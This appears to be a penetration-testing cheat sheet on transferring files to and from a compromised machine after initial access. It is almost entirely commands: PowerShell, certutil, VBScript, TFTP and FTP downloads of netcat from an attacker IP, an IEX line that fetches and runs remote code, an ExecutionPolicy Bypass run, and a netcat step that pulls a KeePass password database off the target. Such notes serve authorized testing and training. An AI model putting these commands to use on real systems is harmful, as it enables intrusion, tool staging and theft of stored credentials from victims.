Transferring Files
How to transfer files
There are various ways to transfer files once an initial foot has been made.
The simplest way to transfer files from one box to another is by using Python SimpleHTTPServer module as can be seen below:
python -m SimpleHTTPServer <port number>
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.10.20/nc.exe','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.10.20/nc.exe -Destination C:\temp\nc.exe")
powershell wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.20/nc.exe')"
echo $storageDir = $pwd > wget1.ps1
echo $webclient = New-Object System.Net.WebClient >> wget1.ps1
echo $url = "http://10.10.10.20/nc.exe" >> wget1.ps1
echo $file = "new-nc.exe" >> wget1.ps1
echo $webclient.DownloadFile($url,$file) >> wget1.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget1.ps1
certutil.exe -urlcache -split -f "http://10.10.10.20/nc.exe" c:\temp\nc.exe
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
On Linux:
mkdir /tftp
atftpd --daemon --port 69 ~/tftp
On Windows:
tftp -i 10.10.10.20 GET nc.exe
Install it first and start service
apt-get install pure-ftpd
service pure-ftpd start
Set up the attacking machine
On the target machine run:
echo open 10.10.10.32 21> ftp1.txt <--- Attacking IP
echo username>> ftp1.txt <--- Your username
echo password>> ftp1.txt <--- Your password
echo binary>> ftp1.txt
echo GET executable.exe>> ftp1.txt
echo bye>> ftp1.txt
ftp -s:ftp1.txt
On Kali-Linux:
python /usr/share/doc/python-impacket/examples/smbserver.py dir-name .
python3 /usr/share/doc/python3-impacket/examples/smbserver.py dir-name .
On Windows:
copy \\KALI_IP\dir-name\name_of_the_file_you_want_to_transfer .
Base64 transfer binaries
# On target
base64 -w0 /path/to/binary <-- copy the content and save into a .b64 file.
# On my kali
base64 -d filename.bs64 > mybinary
chmod +x mybinary
### On a Windows Target ###
nc.exe -v -w 30 -p 4444 -l < some_password.kdbx
listening on [any] 4444 ...
### ON MY KALI ###
nc -v -w 2 TARGET_IP 4444 > password.kdbx
TARGET_IP [TARGET_IP ] 4444 (?) open
Last modified 1yr ago